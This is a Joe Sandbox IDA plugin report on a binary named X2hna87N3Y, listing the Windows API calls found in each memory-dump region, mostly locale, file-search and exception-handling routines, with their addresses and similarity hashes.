                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D9C719
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D9C757
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D9C76A
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D9C7B2
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D9C7CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415426439-0
                                                                                                                  • Opcode ID: 7ea239bf8ca60e7db1596fb900d6736cb9d9fc163a2570526846d335fd124fdb
                                                                                                                  • Instruction ID: e0c77f3c6ba1d87a115fe11664db45f6c3fad82092b2eec64910ad2103614469
                                                                                                                  • Opcode Fuzzy Hash: 7ea239bf8ca60e7db1596fb900d6736cb9d9fc163a2570526846d335fd124fdb
                                                                                                                  • Instruction Fuzzy Hash: AA516D71A20205AFEF10EFA5CC81ABB77B8FF49700F485569E911E7291EB70D9048BB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction ID: 37a066dc76fa12c51f4ac807f9bda618589c05416ca614a213ac30e317d27d68
                                                                                                                  • Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction Fuzzy Hash: 7B023C71E016199FDF15CFA8D8806AEFBF1FF48324F288269D519A7344D731AA41CBA4
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D9D448
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D9D53C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D9D57B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D9D5AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1164774033-0
                                                                                                                  • Opcode ID: fa5ed2f2b913e6ded08fab2435c2c8113aba3b13a132f15633ca87e348d3e3e8
                                                                                                                  • Instruction ID: 0f2c70ac7d54c0d788c0cf610ba92cd1963ed7343d60c150ea899ce3d6e72a94
                                                                                                                  • Opcode Fuzzy Hash: fa5ed2f2b913e6ded08fab2435c2c8113aba3b13a132f15633ca87e348d3e3e8
                                                                                                                  • Instruction Fuzzy Hash: B371E4759051589FDF21AF38CC89ABEBBBAEF45304F1841D9E04C97251DA318E849F30
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D8B658
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D8B724
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D8B73D
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D8B747
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: 6b1e7f735e5017d39a7579d451237724a85003a8a68bb0dc7b923e94f6ad90a1
                                                                                                                  • Instruction ID: cef39a7529c0de3d492e38f6b796ca9cae303d47f5585dbe69553e711835a545
                                                                                                                  • Opcode Fuzzy Hash: 6b1e7f735e5017d39a7579d451237724a85003a8a68bb0dc7b923e94f6ad90a1
                                                                                                                  • Instruction Fuzzy Hash: 4731F875D01318DBEF20EF65D98A7CDBBB8EF08310F1041AAE40CAB250EB719A858F55
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D8C379
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8C388
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D8C391
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D8C39E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction ID: 651b8a81d28880dda7113d606df3e4969a4ded15de8de3af887734c4930399d2
                                                                                                                  • Opcode Fuzzy Hash: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction Fuzzy Hash: B4F05F74D1120DEBCF00EBB5DA4999FBBF4FF1C204B914695A412F6211EA30AB449FA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9C951
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9C99B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 661929714-0
                                                                                                                  • Opcode ID: 906e5e621d442e6e4decc2e1cd4ee39d0c96590b823cffc7b057896360bb9fac
                                                                                                                  • Instruction ID: 2a081cd010179612ca9e28ace45346c775b83597013f1ffece1c77c2d2404303
                                                                                                                  • Opcode Fuzzy Hash: 906e5e621d442e6e4decc2e1cd4ee39d0c96590b823cffc7b057896360bb9fac
                                                                                                                  • Instruction Fuzzy Hash: 2C618E7192020B9FDF28DF28CC82BBA77A8EF14344F1451A9E916C6685EB74D981DB70
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D93D09
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D93D13
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D93D20
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: 33bd949e7aecc262a7e8491584009fb80ea4171b2e5e11ddc1d0b62ef5518a95
                                                                                                                  • Instruction ID: a054b5d9949cc68d3dc741cde28361c6ba4b331d15b990fbf17778a827033bcb
                                                                                                                  • Opcode Fuzzy Hash: 33bd949e7aecc262a7e8491584009fb80ea4171b2e5e11ddc1d0b62ef5518a95
                                                                                                                  • Instruction Fuzzy Hash: FA31B275901228DBCB21EF28D98979DBBB8FF18710F5046DAE41CA6251EB709F818F64
                                                                                                                  APIs
                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA0B71,?,?,00000008,?,?,00DA700B,00000000), ref: 00DA0E43
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3997070919-0
                                                                                                                  • Opcode ID: 75e336fd388154c3a80b14e716efde8ee19b6efae319f32c2a431ff01fbf2d04
                                                                                                                  • Instruction ID: 81b6b90a5b50405d7f51ff125febc2b5716847b04ca27ae1c2089a328f4f21d4
                                                                                                                  • Opcode Fuzzy Hash: 75e336fd388154c3a80b14e716efde8ee19b6efae319f32c2a431ff01fbf2d04
                                                                                                                  • Instruction Fuzzy Hash: 6DB11A326106099FDB15CF28C48AB657FA1FF46364F298658E8D9CF2A1C335EA91CB50
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D8B2CE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2325560087-0
                                                                                                                  • Opcode ID: f261878a24d43c1d1217926e4e46c3085d4ee72481f29669754987e665132ff8
                                                                                                                  • Instruction ID: 0b1ec9d5558d224c388a84a196033ed532e7d3859c96b1a6c29f8bbb58a5f537
                                                                                                                  • Opcode Fuzzy Hash: f261878a24d43c1d1217926e4e46c3085d4ee72481f29669754987e665132ff8
                                                                                                                  • Instruction Fuzzy Hash: 4CA147B6900705DBDB19CF59E8816A9BBF0FB48324F28866AD455E73A0D7349940CF70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CC03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  • Opcode ID: 661997018082e7831bafcbb9f7f25a4d69945f8df51a2724f240acc86ba5c6c7
                                                                                                                  • Instruction ID: 4c7b67dc849a3ef82613b99cee8193792176da425199010e808c635f71adf783
                                                                                                                  • Opcode Fuzzy Hash: 661997018082e7831bafcbb9f7f25a4d69945f8df51a2724f240acc86ba5c6c7
                                                                                                                  • Instruction Fuzzy Hash: 28219272624206ABDF28AB25DE81A7B77A8EF08710B14117AF905D6141EB75ED40CB70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 00166d77a42f594b982a2ef7f8b8c97585e7324e2c7f298d23c36512869d4006
                                                                                                                  • Instruction ID: 5ab1afc0b5ccb7aea562a84258c58c96a5fa31786ee4dba2de836be85577d5a8
                                                                                                                  • Opcode Fuzzy Hash: 00166d77a42f594b982a2ef7f8b8c97585e7324e2c7f298d23c36512869d4006
                                                                                                                  • Instruction Fuzzy Hash: 37C1B9309007468FCF29CF68E988BBABFB5AF06304F184619D59AA7691C331E945CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9C8FD,00000001,00000000,?,?,?,00D9C6ED,00000000), ref: 00D9C8D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  • Opcode ID: 9fc7cc30974e759cc144cc8f29200241227611af03ad2437d7ed2705ec39e21e
                                                                                                                  • Instruction ID: 5ef2fe7c688ed6d82cf93a5665b8cd4514bad405afbef639b2e414ab75693b54
                                                                                                                  • Opcode Fuzzy Hash: 9fc7cc30974e759cc144cc8f29200241227611af03ad2437d7ed2705ec39e21e
                                                                                                                  • Instruction Fuzzy Hash: D011253B6143059FDF18AF39C8916BABBA2FF84358B18442DE94787A40E371A902C760
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CD23
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D9CB19,00000000,00000000,?), ref: 00D9CEA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9CBAF,00000001,?,?,?,?,00D9C6B5,?), ref: 00D9CB9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D93EA8: EnterCriticalSection.KERNEL32(?,?,00D97A60,?,00DB1970,00000008,00D97952,?,?,?), ref: 00D93EB7
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D98603,00000001,00DB19F0,0000000C,00D97F68,?), ref: 00D98648
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1272433827-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9CCCF,00000001,?,?,?,00D9C70F,?), ref: 00D9CCBB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  APIs
